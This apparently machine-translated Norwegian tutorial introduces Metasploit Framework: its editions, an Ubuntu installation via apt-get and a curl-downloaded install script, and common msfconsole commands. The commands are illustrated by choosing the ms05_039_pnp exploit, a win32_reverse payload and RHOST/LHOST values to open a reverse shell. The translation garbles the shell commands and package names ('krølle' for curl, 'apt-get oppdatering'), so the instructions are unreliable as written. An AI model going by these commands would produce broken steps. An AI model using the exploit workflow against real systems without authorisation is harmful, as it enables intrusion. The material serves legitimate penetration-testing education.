- Sårbarhetsvurdering og pentesting
- IDS -signaturutvikling
- Utnytt utvikling og forskning
Den nyeste store Metasploit -utgivelsen har flyttet kjernen til en helt Ruby programmeringsbase. Metasploit-framework bruker Ruby som kjerneprogrammeringsspråk fordi Ruby er et kraftig tolket språk. Metasploit-prosjektet er veldig kjent på grunn av dets anti-rettsmedisinske og deteksjonsunndragelsesfunksjoner.
Metasploit tilbyr vanligvis en fellesskap og åpen kildekode -versjon av Metasploit Framework, men den har også kommersielle versjoner som Metasploit Pro og Metasploit Express. Den har også en skallkodedatabase, disse skallkodene kan brukes til å utføre omvendt skall til angriperens maskin.
Som andre lignende produkter som Canvas eller Core Impact og andre kommersielle sikkerhetsprodukter, kan Metasploit-Framework brukes til å kontrollere sikkerheten til datasystemer eller for å bryte inn i nettverk og systemer. I likhet med mange andre sikkerhetsverktøy kan Metasploit Framework brukes til både autoriserte og uautoriserte aktiviteter.
Følg trinnene nedenfor for å installere Metasploit Framework i Ubuntu OS
Metasploit Frame er enkel å installere og har noen få avhengigheter. Sørg for å oppdatere Ubuntu før du installerer
$sudo apt-get oppdatering$sudo apt-get oppgradering
Installere avhengigheter
Før du installerer må du installere følgende avhengigheter med passende kommando
[e -postbeskyttet]: ~ $sudo apt-get install -ogkrølle gpgv2autokonf bisonbygge-essensielt
git-corelibapr1 postgresql libaprutil1 libcurl4openssl-dev libgmp3-dev libpcap-dev
openssl libpq-dev libreadline6-dev libsqlite3-dev libssl-devLokaliserlibsvn1 libtool
libxml2 libxml2-dev libxslt-devwgetlibyaml-dev ncurses-dev postgresql-contrib xsel
zlib1g zlib1g-dev
Installere
curl brukes til å overføre filer fra eksterne datamaskiner og støtter mange protokoller, vi bruker den til å laste ned metasploit -rammekode.
[e -postbeskyttet]: ~ $krølle https://raw.githubusercontent.com/rask7/metasploitalle/herre/konfigur/maler/metasploit-framework-wrappers/msfupdate.erb
>msfinstall&&
Endre deretter tillatelser for den kjørbare koden ved hjelp av chmod -kommandoen, og kjør den deretter
Tillatelser:eier = Les&Skrive(rw-)
gruppe = Les(r--)
annet = Ingen(---)
Eie:
eier = rot
gruppe = skygge
$chmod 755msfinstall
Metasploit -grensesnitt
Metasploit Framework har et webgrensesnitt, GUI -grensesnitt (Armitage og Cobal Strike) og kommandolinjegrensesnitt (msfcli, msfconsole). Det tilbyr også APIer som msgrpc for å kontrollere Metasploit eksternt eller bruke det sammen med noen skriptspråk for automatiseringsformål.
Den har også noen andre verktøy og funksjoner som kan generere skallkoder og nyttelast og kombinere dem med andre legitime kjørbare filer.
Msfconsole er et kraftig kommandolinjegrensesnitt for Metasploit. For å kjøre den, start først postgresql service, Type
[e -postbeskyttet]: ~ $sudoservice postgresql start[e -postbeskyttet]: ~ $sudomsfconsole
Metasploit -håndbok
Vanlige kommandoer for Metasploit fra manualen
hjelp (eller ‘?’) - viser de tilgjengelige kommandoene i msfconsole
vise bedrifter - viser bedrifter du kan kjøre (i vårt tilfelle her, ms05_039_pnp utnytte)
vise nyttelast - viser de forskjellige nyttelastalternativene du kan utføre på det utnyttede systemet, for eksempel å lage et kommandoskall, laste opp programmer som skal kjøres, etc. (i vårt tilfelle her, win32_reverse utnytte)
info utnytte [utnytte navn] - viser en beskrivelse av et spesifikt utnyttelsesnavn sammen med de forskjellige alternativene og kravene (f.eks. info exploit ms05_039_pnp viser informasjon om det spesifikke angrepet)
info nyttelast [nyttelastnavn] - viser en beskrivelse av et bestemt nyttelastnavn sammen med de forskjellige alternativene og kravene (f.eks. info nyttelast win32_reverse viser informasjon om gyting av et kommandoskall)
bruk [utnytt navn] - instruerer msfconsole om å gå inn i et bestemt utnyttelsesmiljø (f.eks. bruk ms05_039_pnp vil vise kommandoprompten ms05_039_pnp> for denne spesifikke utnyttelsen
vis alternativer - viser de forskjellige parameterne for den spesifikke utnyttelsen du jobber med
vise nyttelast - viser nyttelastene som er kompatible med den spesifikke utnyttelsen du jobber med
sett PAYLOAD - lar deg angi den spesifikke nyttelasten for utnyttelsen din (i dette eksemplet, sett PAYLOAD win32_reverse )
vise mål - viser de tilgjengelige mål -operativsystemene og applikasjonene som kan utnyttes
sett MÅL - lar deg velge ditt spesifikke mål -OS/-program (i dette eksemplet bruker jeg sett MÅL 0 til for alle engelske versjoner av Windows 2000)
sett LIST - lar deg angi målvertsens IP -adresse (i dette eksempelet, sett RHOST 10.0.0.200 )
sett LHOST - lar deg angi den lokale vertens IP -adresse for omvendt kommunikasjon som trengs for å åpne omvendt kommandoskjell (i dette eksemplet, sett LHOST 10.0.0.201 )
tilbake - lar deg avslutte det gjeldende utnyttelsesmiljøet du har lastet inn og gå tilbake til hoved msfconsole -ledeteksten
Konklusjon
Metasploit er et veldig nyttig rammeverk som brukes av penetrasjonstestere og sårbarhetsforskere. Noen andre kommersielle verktøy tilbyr lignende funksjonalitet, men Metasploit er populært på grunn av sin plattformstøtte og brukervennlige GUI- og CLI-grensesnitt. Dette er spesielt egnet for penetrasjonstestere og røde teamere, men hvem som helst kan bruke dette til å sikre hjemmet eller selskapets nettverk. Hvis du er interessert i å lære Metasploit, her er en flott gratis ressurs .